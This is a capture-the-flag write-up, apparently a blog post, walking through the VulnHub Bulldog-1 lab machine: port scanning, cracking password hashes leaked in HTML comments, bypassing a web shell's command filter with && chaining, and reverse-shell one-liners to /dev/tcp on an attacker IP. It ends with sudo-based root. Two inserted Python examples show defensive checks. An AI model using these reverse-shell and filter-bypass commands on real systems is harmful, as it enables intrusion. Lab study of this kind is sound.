Bulldog-1 target write-up

0x00 Environment setup

  • Download link

      https://download.vulnhub.com/bulldog/bulldog.ova

  • Goal
    Get root and read the flag

  • Operating environment
    Target: the VM booted as downloaded
    Attack machines: Kali and Win10

  • Target IP problem

(1) Set the target to NAT mode, on the same network segment as Kali.

(2) If it is set to NAT and Kali still cannot find the target IP, try this:

[1] Reboot the target and, at the boot menu, select the second entry, "Advanced options for Ubuntu".

[2] Select the second option again.

[3] Select root and press Enter to get a command line.

[4] mount -o rw,remount /
[5] ifconfig -a shows every network interface, including those that are not up
[6] vim /etc/network/interfaces and change the interface name
[7] Change every occurrence to the name ending in 33 that ifconfig -a showed
[8] reboot

[9] Scan the network segment from Kali again to test

If it still does not work, try again.
I changed it at first, but the target still did not respond; I tried several times and it still would not work.
Then I deleted the target files, re-imported the target, and modified the IP again.

0x01 Information collection

  • IP detection

    netdiscover -i eth0 -r 192.168.157.0/24


  • Port and service identification

      masscan -p 1-65535 --rate=1000 192.168.157.161

      nmap -A -sC -sV -p 80,23,8080 192.168.157.161 -oN port.txt
    
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 16:34 CST
Nmap scan report for 192.168.157.161
Host is up (0.00042s latency).

PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|   256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_  256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 00:0C:29:27:6E:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.157.161

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.66 seconds

Summary of the open ports:

23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) (ssh is on 23, not the default 22)

80/tcp open http WSGIServer 0.1 (Python 2.7.12)

8080/tcp open http WSGIServer 0.1 (Python 2.7.12)

OS details: Linux 3.2 - 4.9

0x02 Vulnerability mining

Web vulnerability approach

(1) Brute-force the directories, then look at the function and source code of each page to find weaknesses.
(2) Check whether a CMS or other framework with known vulnerabilities is in use that can be exploited directly.
If a manual review with Burp finds nothing, you can also run AWVS, AppScan or Xray scans.

SSH approach

(1) Use Hydra to try weak passwords. If a user name is known, check whether a weak password from the dictionary matches it.
(2) Accounts and passwords obtained from the web application can also be tried; they are likely to be reused as ssh passwords.

Step 1: browse the web directory

(1) Directory brute-force with the Kali and Win10 tools finds
/robots.txt
/admin/login/  a login box
/dev
(2) Browse the home page and click every link
There is only one, /notice/, with nothing to exploit
(3) Look at the discovered pages
/admin/login/ is the login form of the Django admin
/robots.txt is useless
/dev has a lot of content; the useful part is this:

Clicking "web shell" goes to
http://192.168.157.161/dev/shell/
Authentication is required to use it

Reviewing the /dev page source shows that the web developer left the password hashes used for testing in HTML comments
Try to crack them and log in

	<!--Need these password hashes for testing. Django's default is too complex-->
	<!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
	Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
	Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
	Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
	Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
	Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
	Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
	Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->
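As an added example (not part of the original write-up and not code from the Bulldog site), a small audit script that flags the mistake seen above, digests left in HTML comments next to e-mail addresses, so a pre-deploy check can catch it; the sample HTML and its digests are constructed placeholders.

```python
"""Audit an HTML page for password hashes left in comments (added example,
not from the original write-up). SAMPLE below is constructed; its digests
are placeholder values, not the ones from the /dev page."""
import re
from html.parser import HTMLParser

# Hex lengths of common unsalted fast hashes; anything else is ignored
DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256"}
HEX_RE = re.compile(r"\b[0-9a-fA-F]{32,64}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


class CommentAuditor(HTMLParser):
    """Collect digest-shaped strings in comments and remember the last
    e-mail address seen in the surrounding text, as on the leaked page."""

    def __init__(self):
        super().__init__()
        self.last_email = None
        self.findings = []

    def handle_data(self, data):
        m = EMAIL_RE.search(data)
        if m:
            self.last_email = m.group(0)

    def handle_comment(self, data):
        for hexstr in HEX_RE.findall(data):
            algo = DIGEST_LENGTHS.get(len(hexstr))
            if algo:  # only flag lengths that match a known digest size
                self.findings.append((self.last_email, algo, hexstr.lower()))


def find_leaked_hashes(html):
    """Return (email, algorithm, digest) for every digest-shaped comment."""
    auditor = CommentAuditor()
    auditor.feed(html)
    return auditor.findings


# Constructed sample in the shape of the leaked /dev markup (placeholder digests)
SAMPLE = """<!--Need these password hashes for testing-->
Team Lead: alice@example.com<br><!--{sha1}-->
Database: bob@example.com<br><!--{md5}-->
Footer: <!--build 2021-11-30 deadbeef-->
""".format(sha1="a" * 40, md5="b" * 32)

if __name__ == "__main__":
    for email, algo, digest in find_leaked_hashes(SAMPLE):
        print(f"{email}: {algo} digest {digest[:8]}... left in an HTML comment")
```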

Step 2: crack the hashes

Looking the hashes up online recovers the last two passwords:

Mailbox nick@bulldogindustries.com
Password bulldog (found on cmd5)

Mailbox sarah@bulldogindustries.com
Password bulldoglover (found on somd5)

Step 3: log in to the admin backend with the password

(1) Logging in with the e-mail address as user name and the recovered password shows that the account has no operation permission.
(2) ssh login on port 23 fails.
(3) Recall the web shell that required authentication: once authenticated, it is a command-execution interface.

Step 4: command execution (trying to bypass the filter)

Testing shows that many commands are blocked by the page, so try to bypass the filter.
It turns out that chaining an allowed command with && to a disallowed one gets past it.

For example
id            not executed
ls && id      executes
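An added example, not code from the Bulldog application, showing why a filter that validates only the first word and then hands the whole string to a shell is bypassed by && chaining, beside a hardened form that rejects shell metacharacters and runs only an allowlisted program without a shell; the allowlist is constructed for the example.

```python
"""Command-filter bypass and its fix (added example, not the Bulldog app's
own code). ALLOWED is a constructed allowlist for the demonstration."""
import shlex
import subprocess

ALLOWED = {"ls", "pwd", "echo", "cat"}  # constructed allowlist
SHELL_META = set("&|;`$()<>\n")


def naive_check(cmd):
    """Vulnerable check: only the first word is validated, and the caller
    then runs the whole string with shell=True, so 'ls && id' is accepted
    and the shell also executes 'id'."""
    first = cmd.strip().split(" ", 1)[0]
    return first in ALLOWED


def strict_parse(cmd):
    """Hardened check: reject shell metacharacters, tokenize with shlex and
    require the program to be allowlisted. Returns argv, or None if rejected."""
    if any(ch in SHELL_META for ch in cmd):
        return None
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes and similar
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    return argv


def run_allowed(cmd, timeout=5):
    """Run only an allowlisted program, never through a shell; None if rejected."""
    argv = strict_parse(cmd)
    if argv is None:
        return None
    result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return result.stdout


if __name__ == "__main__":
    for c in ("ls && id", "echo hi; id", "echo hi"):
        print(f"{c!r:16} naive={naive_check(c)} strict={strict_parse(c)}")
```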

Step 5: reverse shell

(1)

	ls && bash -c 'exec bash -i &>/dev/tcp/192.168.157.137/8080 <&1'

(2) You can also echo the reverse-shell command and pipe it into bash

echo "bash -i >& /dev/tcp/192.168.157.137/8080 0>&1" | bash

That is, echo outputs the command string and bash reads it from its standard input.

Both methods give a reverse shell successfully

0x03 Privilege escalation

Step 6: check the system users and decide which ones deserve attention

Two users have /bin/bash as their shell: django and bulldogadmin

Step 7: find each user's files

(1) Look at bulldogadmin first

find / -user bulldogadmin 2>/dev/null

Show only the non-error output
(2>/dev/null redirects standard error to /dev/null, the Linux device file commonly called the black hole, which discards everything written to it)

(2) Two files are found in a hidden directory

/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
/home/bulldogadmin/.hiddenadmindirectory/note

(3) The note file should be a text file, so cat it directly

cat /home/bulldogadmin/.hiddenadmindirectory/note

(4) The app looks like an executable; use strings to print its printable character sequences and take a look

strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp

Step 8: assemble the root password and escalate

The strings output contains

SUPERultH
imatePASH
SWORDyouH
CANTget

Remove the trailing H from each fragment and join them:

SUPERultimatePASSWORDyouCANTget

It could be a password

su

must be run from a terminal

Convert the shell to a fully interactive tty with the following command

 python -c 'import pty; pty.spawn("/bin/bash")'

Then again

su

Error: su: Authentication failure

What is needed is

sudo su
SUPERultimatePASSWORDyouCANTget

cd ..
cat congrats.txt

0x04 Summary of ideas

1. Use directory brute-forcing to find the webshell page from the discovered /dev page content, and read the accounts and password hashes needed for its authentication from the page source.
2. Operating-system commands can be executed through the webshell page, but a direct bash reverse shell is blocked. Bypass it with echo (output the command string and pipe it into bash) or with chaining such as ls && id.
3. After getting a shell, go through the files to look for clues such as passwords.
4. The su command reports "must be run from a terminal"; if python is available,
python -c 'import pty;pty.spawn("/bin/bash")'
converts the shell to terminal (tty) mode.

Tags: Linux network security

Posted on Tue, 30 Nov 2021 11:04:20 -0500 by HFD